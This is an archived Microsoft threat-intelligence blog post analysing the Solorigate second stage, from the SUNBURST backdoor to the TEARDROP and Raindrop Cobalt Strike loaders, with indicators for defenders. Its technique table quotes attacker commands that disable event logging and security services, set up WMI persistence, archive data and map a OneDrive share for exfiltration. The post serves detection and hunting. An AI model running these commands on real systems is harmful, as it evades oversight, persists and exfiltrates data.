{ "id": "df031e23-596c-4b8f-9f3a-5e36f253e995", "created_at": "2026-04-06T00:20:11.85993Z", "updated_at": "2026-04-10T03:37:32.632906Z", "deleted_at": null, "sha1_hash": "a8440c5ab81f56ad010d64479dc9007c203eab1c", "title": "Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1230180, "plain_text": "Deep dive into the Solorigate second-stage activation: From SUNBURST\r\nto TEARDROP and Raindrop\r\nBy Microsoft Cyber Defense Operations Center (CDOC), Microsoft Threat Intelligence\r\nPublished: 2021-01-20 · Archived: 2026-04-05 21:17:04 UTC\r\nUPDATE: Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the\r\nnation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations.\r\nMicrosoft previously used ‘Solorigate’ as the primary designation for the actor, but moving forward, we want to place\r\nappropriate focus on the actors behind the sophisticated attacks, rather than one of the examples of malware used by the\r\nactors. Microsoft Threat Intelligence Center (MSTIC) has named the actor behind the attack against SolarWinds, the\r\nSUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM. As we release new content and\r\nanalysis, we will use NOBELIUM to refer to the actor and the campaign of attacks.\r\nMore than a month into the discovery of Solorigate, investigations continue to unearth new details that prove it is one of the\r\nmost sophisticated and protracted intrusion attacks of the decade. Our continued analysis of threat data shows that the\r\nattackers behind Solorigate are skilled campaign operators who carefully planned and executed the attack, remaining\r\nelusive while maintaining persistence. These attackers appear to be knowledgeable about operations security and\r\nperforming malicious activity with minimal footprint. In this blog, we’ll share new information to help better understand\r\nhow the attack transpired. Our goal is to continue empowering the defender community by helping to increase their ability\r\nto hunt for the earliest artifacts of compromise and protect their networks from this threat.\r\nWe have published our in-depth analysis of the Solorigate backdoor malware (also referred to as SUNBURST by FireEye),\r\nthe compromised DLL that was deployed on networks as part of SolarWinds products, that allowed attackers to gain\r\nbackdoor access to affected devices. We have also detailed the hands-on-keyboard techniques that attackers employed on\r\ncompromised endpoints using a powerful second-stage payload, one of several custom Cobalt Strike loaders, including the\r\nloader dubbed TEARDROP by FireEye and a variant named Raindrop by Symantec.\r\nOne missing link in the complex Solorigate attack chain is the handover from the Solorigate DLL backdoor to the Cobalt\r\nStrike loader. Our investigations show that the attackers went out of their way to ensure that these two components are\r\nseparated as much as possible to evade detection. This blog provides details about this handover based on a limited number\r\nof cases where this process occurred. To uncover these cases, we used the powerful, cross-domain optics of Microsoft 365\r\nDefender to gain visibility across the entire attack chain in one complete and consolidated view.\r\nWe’ll also share our deep dive into additional hands-on-keyboard techniques that the attackers used during initial\r\nreconnaissance, data collection, and exfiltration, which complement the broader TTPs from similar investigative blogs,\r\nsuch as those from FireEye and Volexity.\r\nThe missing link: From the Solorigate backdoor to Cobalt Strike implants\r\nAn attack timeline that SolarWinds disclosed in a recent blog showed that a fully functional Solorigate DLL backdoor was\r\ncompiled at the end of February 2020 and distributed to systems sometime in late March.  The same blog also said that the\r\nattackers removed the Solorigate backdoor code from SolarWinds’ build environment in June 2020.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 1 of 21\n\nConsidering this timeline and the fact that the Solorigate backdoor was designed to stay dormant for at least two weeks, we\r\napproximate that the attackers spent a month or so in selecting victims and preparing unique Cobalt Strike implants as well\r\nas command-and-control (C2) infrastructure. This approximation means that real hands-on-keyboard activity most likely\r\nstarted as early as May.\r\nThe removal of the backdoor-generation function and the compromised code from SolarWinds binaries in June could\r\nindicate that, by this time, the attackers had reached a sufficient number of interesting targets, and their objective shifted\r\nfrom deployment and activation of the backdoor (Stage 1) to being operational on selected victim networks, continuing the\r\nattack with hands-on-keyboard activity using the Cobalt Strike implants (Stage 2).\r\nFigure 1. Timeline of the protracted Solorigate attack\r\nBut how exactly does this jump from the Solorigate backdoor (SUNBURST) to the Cobalt Strike loader (TEARDROP,\r\nRaindrop, and others) happen? What code gets triggered, and what indicators should defenders look for?\r\nFigure 2. Diagram of transition between Stage 1 and Stage 2 of the Solorigate attack\r\nSophisticated attackers like those behind Solorigate have a goal of expansion and stealthy persistence to maximize the\r\namount of time they can remain undetected and collect valuable information. It’s important for organizations to be able to\r\nlook at forensic data across their entire environment to see how far attackers have traversed the network and how long they\r\nwere there, in order to have confidence that attacks have been properly remediated from the environment. The best way to\r\ndo that is with an extended detection and response (XDR) solution that enables organizations to replay past events to look\r\nfor activity that might reveal the presence of an attacker on the network. Affected organizations without an XDR solution\r\nlike Microsoft 365 Defender in place will have a difficult job of performing incident response.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 2 of 21\n\nWhat we found from our hunting exercise across Microsoft 365 Defender data further confirms the high level of skill of the\r\nattackers and the painstaking planning of every detail to avoid discovery. To illustrate, the following diagram shows the\r\nentry vector attack chain at a glance:\r\nFigure 3. Transition from Solorigate backdoor to Cobalt Strike\r\nWe spent countless hours investigating Microsoft Defender telemetry and other signals from potential patient-zero\r\nmachines running the backdoored version of SolarWinds DLL. Most of these machines communicated with the initial\r\nrandomly generated DNS domain .avsvmcloud.com but without significant activity (step #1). However, we saw limited\r\ncases in May and June where the initial DNS network communication was closely followed by network activity on port 443\r\n(HTTPS) to other legit-looking domains (step #7). On these handful of machines, we performed deep inspection of\r\ntelemetry.\r\nWe know that the Solorigate backdoor only activates for certain victim profiles, and when this happens, the executing\r\nprocess (usually SolarWinds.BusinessLayerHost.exe) creates two files on disk (step #2):\r\nA VBScript, typically named after existing services or folders to blend into legitimate activities on the machine\r\nA second-stage DLL implant, a custom Cobalt Strike loader, typically compiled uniquely per machine and written\r\ninto a legitimate-looking subfolder in %WinDir% (e.g., C:\\Windows)\r\nAt this point the attackers are ready to activate the Cobalt Strike implant. However, the attackers apparently deem the\r\npowerful SolarWinds backdoor too valuable to lose in case of discovery, so they tried to separate the Cobalt Strike loader’s\r\nexecution from the SolarWinds process as much as possible. Their hope is that, even if they lose the Cobalt Strike implant\r\ndue to detection, the compromised SolarWinds binary and the supply chain attack that preceded it are not exposed.\r\nThe attackers achieved this by having the SolarWinds process create an Image File Execution Options (IFEO) Debugger\r\nregistry value for the process dllhost.exe (step #3). This is a known MITRE ATT\u0026CK technique used for persistence, but it\r\ncould also be abused to trigger execution of malicious code when a certain process is launched. Once the registry value is\r\ncreated, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system.\r\nThis execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4.\r\nThe VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent/child process tree\r\ncompletely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 3 of 21\n\nclean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy:\r\nHKEY_CURRENT_USER\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\AutoDetect\r\nHKEY_CURRENT_USER\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\r\nSettings\\AutoConfigURL\r\nAnalyzing the custom Cobalt Strike loaders\r\nIn our investigation, we identified several second-stage malware, including TEARDROP, Raindrop, and other custom\r\nloaders for the Cobalt Strike beacon. During the lateral movement phase, the custom loader DLLs are dropped mostly in\r\nexisting Windows sub-directories. Below are some example paths (additional paths are listed at the end of this blog):\r\nC:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\SKB\\LangModel.dll\r\nC:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nC:\\Windows\\LiveKernelReports\\KerRep.dll\r\nThe files have names that resemble legitimate Windows file and directory names, once again demonstrating how the\r\nattackers attempted to blend in the environment and hide in plain sight:\r\nLegitimate Windows file/directory Malicious custom loader\r\nC:\\Windows\\ELAMBKUP\\WdBoot.sys C:\\Windows\\ELAMBKUP\\WdBoot.dll\r\nC:\\Windows\\Registration\\CRMLog C:\\Windows\\Registration\\crmlog.dll\r\nC:\\Windows\\SKB\\LanguageModels C:\\Windows\\SKB\\LangModel.dll\r\nC:\\Windows\\AppPatch\\AcRes.dll C:\\Windows\\AppPatch\\AcWin.dll\r\nC:\\Windows\\PrintDialog\\appxsignature.p7x C:\\Windows\\PrintDialog\\appxsig.dll\r\nC:\\Windows\\Microsoft.NET\\Framework64\\sbscmp10.dll C:\\Windows\\Microsoft.NET\\Framework64\\sbscmp30.dll\r\nC:\\Windows\\Panther\\MainQueueOnline0.que C:\\Windows\\Panther\\MainQueueOnline.dll\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\\r\n3.5.0.0__b03f5f7f11d50a3a\\MSBuild.exe\r\nC:\\Windows\\assembly\\GAC_64\\MSBuild\\\r\n3.5.0.0__b03f5f7f11d50a3a\\msbuild.dll\r\nTEARDROP, Raindrop, and the other custom Cobalt Strike Beacon loaders observed during the Solorigate investigation are\r\nlikely generated using custom Artifact Kit templates. Each custom loader loads either a Beacon Reflective Loader or a\r\npreliminary loader that subsequently loads the Beacon Reflective Loader. Reflective DLL loading is a technique for loading\r\na DLL into a process memory without using the Windows loader.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 4 of 21\n\nFigure 4. Structure of the two variants of Cobalt Strike Beacon loaders observed in Solorigate attacks\r\nIn the succeeding sections, we discuss the Cobalt Strike Beacon variants we observed in our Solorigate investigations.\r\nVariant 1: TEARDROP\r\nTo date, Microsoft has analyzed two versions of the second-stage custom Cobalt Strike Beacon loader known as\r\nTEARDROP (detected as Trojan:Win64/Solorigate.SA!dha by Microsoft):\r\nA service DLL (loaded by svchost.exe) with a ServiceMain function typically named NetSetupServiceMain\r\nA standard non-Service DLL loaded by rundll32.exe\r\nIrrespective of the loading methodology, both versions have an export function that contains the trigger for the malicious\r\ncode. The malicious code is executed in a new thread created by the export function. Upon execution, the malicious code\r\nattempts to open a file with a .jpg extension (e.g., festive_computer.jpg, upbeat_anxiety.jpg, gracious_truth.jpg,\r\nand confident_promotion.jpg). Further analysis is required to determine the purpose and role of the .jpg file referenced by\r\neach sample. The code also checks the presence of the Windows registry key SOFTWARE\\Microsoft\\CTF and terminates if\r\nthe registry key is present or accessible. Next, the code proceeds to decode and subsequently execute an embedded custom\r\npreliminary loader.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 5 of 21\n\nFigure 5. Structure of Variant 1 custom loader\r\nThe preliminary loader used by this variant of custom loader is typically generated using a Cobalt Strike Artifact Kit\r\ntemplate (e.g., bypass-pipe.c):\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 6 of 21\n\nFigure 6. Disassembled function from preliminary loader compiled from Artifact Kit’s bypass-pipe.c template\r\nIn its true form, the custom Artifact Kit-generated preliminary loader is a DLL that has been transformed and loaded like\r\nshellcode in memory. The preliminary loader is responsible for loading the next-stage component, which is a Beacon\r\nReflective Loader/DLL (Cobalt Strike Beacon is compiled as a reflective DLL). The Reflective Loader ultimately\r\ninitializes and executes Beacon in memory.\r\nVariant 2: Additional custom loaders\r\nIn our investigations, we came across additional custom loaders for Cobalt Strike’s Beacon that appear to be generated\r\nusing custom Cobalt Strike Artifact Kit templates. Unlike TEARDROP, in which the malicious code is triggered by an\r\nexport function, the malicious code in these variants is triggered directly from the DLL’s entry point, which creates a new\r\nthread to execute the malicious code. These Variant 2 custom loaders also contain an attacker-introduced export (using\r\nvarying names) whose only purpose is to call the Sleep() function every minute.\r\nFigure 7. Example of a custom export function from a Variant 2 loader\r\nAdditionally, unlike TEARDROP, these variants do not contain a custom preliminary loader, meaning the loader DLL de-obfuscates and subsequently executes the Cobalt Strike Reflective DLL in memory.\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 7 of 21\n\nFigure 8. Structure of Variant 2 custom Loader\r\nThese custom loaders can be further divided into two types:\r\nType A: A set of large DLLs that decode and load the Cobalt Strike Reflective Loader from the DLL’s DATA section\r\n(detected as Trojan:Win64/Solorigate.SC!dha by Microsoft)\r\nType B: A set of smaller DLLs that de-obfuscate and load the Reflective Loader from the DLL’s CODE section (also\r\nreferred to as Raindrop by Symantec, detected as Trojan:Win64/Solorigate.SB!dha by Microsoft)\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 8 of 21\n\nFigure 9. Two subtypes of the custom Loader\r\nThe ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory.\r\nType A loaders use a simple rolling XOR methodology to decode the Reflective Loader, while Type B loaders (Raindrop)\r\nutilize a combination of the AES-256 encryption algorithm (unique key per sample), LZMA compression, and a single-byte\r\nXOR decoding routine to de-obfuscate the embedded Reflective Loader in memory. At the conclusion of the de-obfuscation\r\nprocess, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon\r\nin memory.\r\nForensic observations about the Solorigate Cobalt Strike loaders\r\nMetadata and timeline analysis of the custom loaders, combined with analysis of the configuration data extracted from each\r\nBeacon payload, led to following discoveries:\r\nThe custom loader DLLs were introduced to compromised systems between the hours of 8:00 AM and 5:00 PM\r\nUTC. In one intrusion, the first second-stage custom loader (TEARDROP) was introduced to the environment\r\nby BusinessLayerHost.exe at around 10:00 AM UTC.\r\nThe custom loader DLLs dropped on disk carried compile timestamps ranging from July 2020 to October 2020,\r\nwhile the embedded Reflective DLLs carried compile timestamps ranging from March 2016 to November 2017. The\r\npresence of 2016-2017 compile timestamps is likely due to attackers’ usage of custom Malleable C2 profiles with\r\nsynthetic compile timestamp (compile_time) values. At first glance it would appear as if the actor did not timestamp\r\nthe compile time of the custom loader DLLs (2020 compile timestamps). However, forensic analysis of\r\ncompromised systems revealed that in a few cases, the timestamp of the custom loader DLLs’ introduction to\r\nsystems predated the compile timestamps of the custom loader DLLs (i.e., the DLLs appear to have been compiled\r\nat a future date).\r\nBoth Variant 1 and 2 custom loader DLLs were configured with PE version information that masquerades version\r\ninformation belonging to legitimate applications and files from Windows (e.g., DLL), 7-Zip (e.g., 7z.dll), Far\r\nManager (e.g., Far.dll), LibIntl (e.g., libintl3.dll), and other legitimate applications. The Variant 2 custom loaders\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 9 of 21\n\nwere mostly compiled from open-source source code of legitimate applications, such as 7-Zip and Far Manager (i.e.,\r\nthe open-source source code for these applications was modified to add in the malicious code). In some instances,\r\ncertain development artifacts were left behind in the custom loader samples. For example, the following C++ header\r\n(.hpp) path was observed in a loader compiled from a modified Far Manager open-source source code\r\n(c:\\build\\workspace\\cobalt_cryptor_far (dev071)\\farmanager\\far\\platform.concurrency.hpp):\r\nFigure 10. File path for a C++ header file (.hpp) observed in custom Cobalt Strike loader samples\r\nEach custom loader DLL contains a designated PE export function that either triggers the malicious functionality of\r\nthe loader (in Variant 1) or calls the Sleep() function (Variant 2). A non-comprehensive list of these PE export\r\nfunction names (one per loader DLL) is included below (note the repeating “Tk” prefix in the export names that can\r\nbe a useful indicator for hunting purposes):\r\n__GetClasterInf FreeSetupRevoke Tk_GetRootCoords\r\nTkComputeAnchor TkpSetMainMenubar __RtlProjectObj\r\nGetLimitStroke Tk_IntersectTextLayout TkDebugBorder\r\nTkSelPropProc __TkGlobal NetSetupServiceMain\r\nTk_NameOf3DBorder TkFindStateString TkWinCancelMouseTimer\r\n_XInitImageFuncPtrs RestVirtAlloc Tk_PostscriptImage\r\nTkGetDefaultScreenName TkWinClipboardRender CreateLocalThread\r\nSetTkPrv Tk_QueryAllocMem TkGrabState\r\nXClearWindow CreateProcessTVI Tk_GetElementBox\r\nTk_SizeOfImage TkpSetKeycodeAndState XCreateBitmapFromData\r\nIn addition to the attackers dropping the custom loaders in unique locations on each system during the lateral\r\nmovement phase, most Beacon and Reflective Loader instances discovered during our investigation were configured\r\nwith a unique C2 domain name, unique Watermark ID, unique PE compile timestamp, PE Original Name (), DNS\r\nIdle IP (e.g., 84[.]200[.]70[.]40 , 208[.]67[.]220[.]220, 208[.]67[.]222[.]222, 9[.]9[.]9[.]9, and 8[.]8[.]4[.]4),\r\nunique User-Agent and HTTP POST/GET transaction URI, sleep time, and jitter factor. This is notable since no two\r\nBeacon instances shared the same C2 domain name, Watermark, or other aforementioned configuration values.\r\nOther than certain internal fields, most Beacon configuration fields are customizable via a Malleable C2 profile. If\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 10 of 21\n\nthe actor did indeed use custom Malleable C2 profiles, as evidenced in the list above, the profiles varied greatly for\r\nBeacon instances used during different lateral movement campaigns within the same network. As mentioned above,\r\neach Beacon instance carries a unique Watermark value. Analysis of the Watermark values revealed that all\r\nWatermark values start with the number ‘3’, for example:\r\n0x30343131 0x34353633 0x38303535 0x38383238\r\n0x32323638 0x35373331 0x38353138 0x38383430\r\nAs for post-exploitation artifacts, the observed Beacon instances were configured to use different “spawnto” values,\r\nwhich Cobalt Strike uses to spawn a temporary process and inject its post-exploitation-related components or\r\nfeatures into the spawned process. This detail could be valuable for hunting process creation events originated\r\nby exe. Below are some example paths used by the observed Beacon instances:\r\n%WINDIR%\\System32\\conhost.exe\r\n%WINDIR%\\System32\\control.exe\r\n%WINDIR%\\System32\\dllhost.exe\r\n%WINDIR%\\System32\\help.exe\r\n%WINDIR%\\System32\\LogonUI.exe\r\n%WINDIR%\\System32\\msiexec.exe\r\n%WINDIR%\\System32\\print.exe\r\n%WINDIR%\\SysWOW64\\audiodg.exe\r\n%WINDIR%\\SysWOW64\\help.exe\r\n%WINDIR%\\SysWOW64\\msiexec.exe\r\n%WINDIR%\\SysWOW64\\msinfo32.exe\r\n%WINDIR%\\SysWOW64\\print.exe\r\n%WINDIR%\\SysWOW64\\WerFault.exe\r\nAdditional attacker tactics, anti-forensic behavior, and operational security\r\nAs mentioned, the attackers behind Solorigate are skillful and methodic operators who follow operations security (OpSec)\r\nbest practices to minimize traces, stay under the radar, and avoid detection.\r\nDuring our in-depth analysis of the attacker’s tactics, techniques, and procedures (TTPs) seen through the lens of Microsoft\r\n365 Defender’s rich telemetry, we observed a few techniques that are worth disclosing to help other defenders better\r\nrespond to this incident and use hunting tools like Microsoft 365 Defender advanced hunting or Azure Sentinel queries to\r\nsearch for potential traces of past activity.\r\nSome examples of why these attackers stand out for their professional OpSec methodology and anti-forensic behavior are\r\nlisted below:\r\nMethodic avoidance of shared indicators for each compromised host. As discussed in the previous section, each\r\nCobalt Strike DLL implant was prepared to be unique per machine and avoided at any cost overlap and reuse of\r\nfolder name, file name, export function names, C2 domain/IP, HTTP requests, timestamp, file metadata, config, and\r\nchild process launched. This extreme level of variance was also applied to non-executable entities, such as WMI\r\npersistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Applying\r\nthis level of permutations for each individual compromised machine is an incredible effort normally not seen with\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 11 of 21\n\nother adversaries and done to prevent full identification of all compromised assets inside a network or effective\r\nsharing of threat intel between victims.\r\nCamouflage and blending into the environment. Tools and binaries used by the attackers (e.g., ADFIND legit tool)\r\nwere always renamed and placed in folders that mimicked existing programs and files already present on a machine.\r\nThis blending was not just used for files, but for other elements. For example, WMI persistence filters were created\r\nwith names and queries matching other scripts present in affected organizations.\r\nBefore running intensive and continued hands-on keyboard activity, the attackers took care of disabling event\r\nlogging using AUDITPOL and re-enabling it afterward.\r\nIn a similar way, before running noisy network enumeration activities (such as repeated NSLOOKUP or LDAP\r\nqueries), the attackers carefully prepared special firewall rules to minimize outgoing packets for certain protocols.\r\nThe firewall rules were also methodically removed after the network reconnaissance was completed.\r\nLateral movement activities were never executed without preparation. To increase the likelihood that their activities\r\nremain undetected, the attackers first enumerated remote processes and services running on the target host and\r\ndecided to move laterally only after disabling certain security services.\r\nWe believe that the attackers used timestomping to change timestamps of artifacts and also leveraged professional\r\nwiping procedures and tools to complicate finding and recovering of DLL implants from affected environments.\r\nSee some of the most interesting and unique TTPs in the table below. In most cases, commands and tools are executed via\r\nan intermediate “cmd.exe /C” process launched from the Cobalt Strike main parent process. We are actively working with\r\nMITRE to make sure that any novel technique emerging from this incident is documented in future updates of the\r\nATT\u0026CK framework.\r\nObserved attacker behavior Example MITRE ATT\u0026CK\r\nAttackers always ran the\r\nTEARDROP implant\r\nthrough rundll32.exe,\r\nwhich is also the main\r\nprocess used in\r\ncommunicating with the\r\nC2.Execution of additional\r\ncommands from\r\nrundll32.exe seemed to be\r\noften interleaved with\r\n“cmd.exe /C”. This info can\r\nbe useful for hunting this\r\nspecific process tree chain\r\nas showed in the\r\nexample.When the\r\nattackers needed to execute\r\nmore risky actions on\r\nobjectives (e.g., credential\r\ntheft, or recon), they\r\nspawned an additional\r\ndllhost.exe process with no\r\nProcess-Tree:\r\nrundll32.exe c:\\windows\\[folder]\\[beacon].dll\r\n[export]\r\n-\u003e cmd.exe /C\r\n-\u003e [additional command]\r\nT1218.011 |\r\nDefense Evasion –\r\nSigned Binary\r\nProxy Execution:\r\nRundll32\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 12 of 21\n\ncommand-line, which is a\r\nrare event.\r\nWhen executed during\r\nlateral movement,\r\nrundll32.exe ran through\r\nWMIC or Invoke-WMIMethod with “High”\r\nintegrity level and spawned\r\nby WmiPrvSE.exe, which\r\nis a rare combination. The\r\nCobalt Strike DLL was\r\nlikely deleted after\r\ncompleted execution to\r\navoid forensic recovery.\r\nVariant1 (executed from PowerShell as a result of\r\nissuing the “remote-exec” Cobalt Strike\r\ncommand):Invoke-WMIMethod win32_process -\r\nname create -argumentlist ‘rundll32 c:\\Windows\\\r\n[folder]\\[beacon].dll [export]’ -ComputerName\r\n[target]Variant2 (executed from\r\nrundll32.exe):wmic /node:[target] process call\r\ncreate “rundll32 c:\\windows\\[folder]\\[beacon].dll\r\n[export]”\r\nT1047 | Windows\r\nManagement\r\nInstrumentation\r\n(WMI)\r\nA WMI event filter was\r\nused to invoke a command-line event consumer at\r\nsystem boot time to launch\r\na backdoor with\r\nrundll32.exe.\r\ninstance of __eventfilter\r\n{\r\neventnamespace = “”root\\\\cimv2″”;\r\nname = “”__timeritem””;\r\nquery = “”select * from\r\n__instancemodificationevent within 70 where\r\ntargetinstance isa\r\n‘win32_perfformatteddata_perfos_system’ and\r\ntargetinstance.systemuptime \u003e= 300 and\r\ntargetinstance.systemuptime \u003c 400″”;\r\nquerylanguage = “”wql””;\r\n};\r\nperm. consumer:\r\ninstance of commandlineeventconsumer\r\n{\r\ncommandlinetemplate =\r\n“”c:\\\\windows\\\\system32\\\\rundll32.exe\r\nc:\\\\windows\\\\[folder]\\\\[beacon].dll, [export]””;\r\nexecutablepath =\r\n“”c:\\\\windows\\\\system32\\\\rundll32.exe””;\r\nname = “”setpolicytrace””;\r\n};\r\nT1546.003 |\r\nPersistence –\r\nEvent Triggered\r\nExecution:\r\nWindows\r\nManagement\r\nInstrumentation\r\nEvent Subscription\r\nAttackers used AUDITPOL\r\nto prevent the collection of\r\nadditional audit logs and\r\nevidence trail.\r\nauditpol /GET /category:”Detailed Tracking”\r\nauditpol /set /category:”Detailed Tracking”\r\n/success:disable /failure:disable[execution of\r\nseveral commands and actions]auditpol /set\r\n/category:”Detailed Tracking” /success:enable\r\n/failure:enable\r\nT1562.002 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable Windows\r\nEvent Logging\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 13 of 21\n\nAttackers used NETSH to\r\nconfigure firewall rules that\r\nlimit certain UDP outbound\r\npackets (to reduce noise or\r\nfootprint) before intense\r\nrecon with NSLOOKUP\r\nand ADFIND.\r\nnetsh advfirewall firewall add rule\r\nname=”[rulename1]” protocol=UDP dir=out\r\nlocalport=137 action=block\r\nnetsh advfirewall firewall add rule\r\nname=”[rulename2]” protocol=UDP dir=out\r\nlocalport=53 action=block[execution of several\r\nnetwork recon]netsh advfirewall firewall delete\r\nrule name=”[rulename1]”\r\nnetsh advfirewall firewall delete rule\r\nname=”[rulename2]”\r\nT1562.004 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nSystem Firewall\r\nAttackers used fsutil to\r\ncheck available free space\r\nbefore executing collection,\r\nenumeration, exfiltration,\r\nor launching attacks like\r\nDCSync which might\r\ncreate large files on disk.\r\nfsutil volume diskfree c:\r\nAttackers used multiple\r\ncommand-line utilities to\r\nenumerate running process,\r\nservices, and signed-in\r\nusers on a remote system\r\nbefore attempting lateral\r\nmovement.\r\n– tasklist /v /s [target]\r\n– query user /server:[target]\r\n– schtasks /query /v /s [target] /fo csv\r\n– sc \\\\[target] query type=service state=all\r\n– wmic /node:”[target]” service get\r\nname,startname\r\nT1047 | Windows\r\nManagement\r\nInstrumentation\r\n(WMI),\r\nT1057 | Process\r\nDiscovery\r\nAttackers used the service\r\ncontrol manager on a\r\nremote system to disable\r\nservices associated with\r\nsecurity monitoring\r\nproducts. They then moved\r\nlaterally to the remote\r\nsystem and, when the move\r\nwas complete, they re-enabled the services on the\r\nsource machine where they\r\nwere operating previously\r\nto avoid raising warnings.\r\nOn Source Machine:sc \\\\[dest_machine] stop\r\n[service name][perform lateral move Source-\r\n\u003eDest]Once on Dest Machine:sc \\\\\r\n[source_machine] start [service name]\r\nT1562.001 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nTools\r\nAttackers set the service\r\nstart registry key for\r\nsecurity monitoring\r\nproducts to “disabled” (i.e.,\r\nDWORD value of “4”).\r\nThis prevented security\r\nreg add HKLM\\system\\currentcontrolset\\services\\\r\n[service name] /v Start /t REG_DWORD /d 4″\r\nT1562.001 |\r\nDefense Evasion –\r\nImpair Defenses:\r\nDisable or Modify\r\nTools\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 14 of 21\n\nproducts from loading\r\nwhen the system starts. In\r\nsome cases, the attackers\r\nwaited to perform activity\r\non the system until the\r\nsystem restarts and security\r\nmonitoring products were\r\ndisabled.\r\nAttackers modified\r\ntimestamps of backdoors to\r\nmatch a legitimate\r\nWindows file (e.g.,\r\narp.exe).\r\nn/a\r\nT1070.006 |\r\nIndicator Removal\r\non Host:\r\nTimestomp\r\nAttackers used the 7-zip\r\nutility to create a password-protected archive with an\r\nextension not associated\r\nwith archive files. In some\r\ncases they also used the\r\nflag “-v” to split the archive\r\nin multiple files for easier\r\nexfiltration.\r\n7z.exe a -mx9 -r0 -p[password-redacted] .\\\r\n[filename1].zip .\\[filename2].log or .txt7z.exe a -\r\nv500m -mx9 -r0 -p[password-redacted] .\\\r\n[filename1].zip .\\[filename2].log or .txt\r\nT1560.001 |\r\nArchive Collected\r\nData: Archive via\r\nUtility\r\nAttackers mapped a\r\nOneDrive share from the\r\ncommand-line using the\r\nnet.exe command-line\r\nutility, possibly for\r\nexfiltration; other cloud\r\nservices like Google Drive\r\nwere most likely also used.\r\nnet use [drive]: “https://d.docs.live.net/[user-id]”\r\n/u:[username] [password]\r\nT1567.002 |\r\nExfiltration Over\r\nWeb Service:\r\nExfiltration to\r\nCloud Storage\r\nAttackers attempted to\r\naccess Group Managed\r\nService Account (gMSA)\r\npasswords with account\r\ncredentials they have\r\nalready obtained.\r\nn/a\r\nT1555 |\r\nCredentials from\r\nPassword Stores\r\nAttackers leveraged\r\nprivileged accounts to\r\nreplicate directory service\r\ndata with Domain\r\nControllers (e.g., a DCSync\r\nattack).\r\nn/a\r\nT1003.006 | OS\r\nCredential\r\nDumping: DCSync\r\nhttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\r\nPage 15 of 21\n\nAttackers obtained Ticket\r\nGranting Service (TGS)\r\ntickets for Active Directory\r\nService Principal Names\r\n(SPNs) to crack offline\r\n(e.g., Kerberoasting).\r\nn/a\r\nT1558.003 | Steal\r\nor Forge Kerberos\r\nTickets:\r\nKerberoasting\r\nAttackers executed multiple\r\ntimes the legitimate\r\nADFIND tool to enumerate\r\ndomains, remote systems,\r\naccounts and to discover\r\ntrust between federated\r\ndomains. The tool was\r\nexecuted with a renamed\r\nfilename chosen to 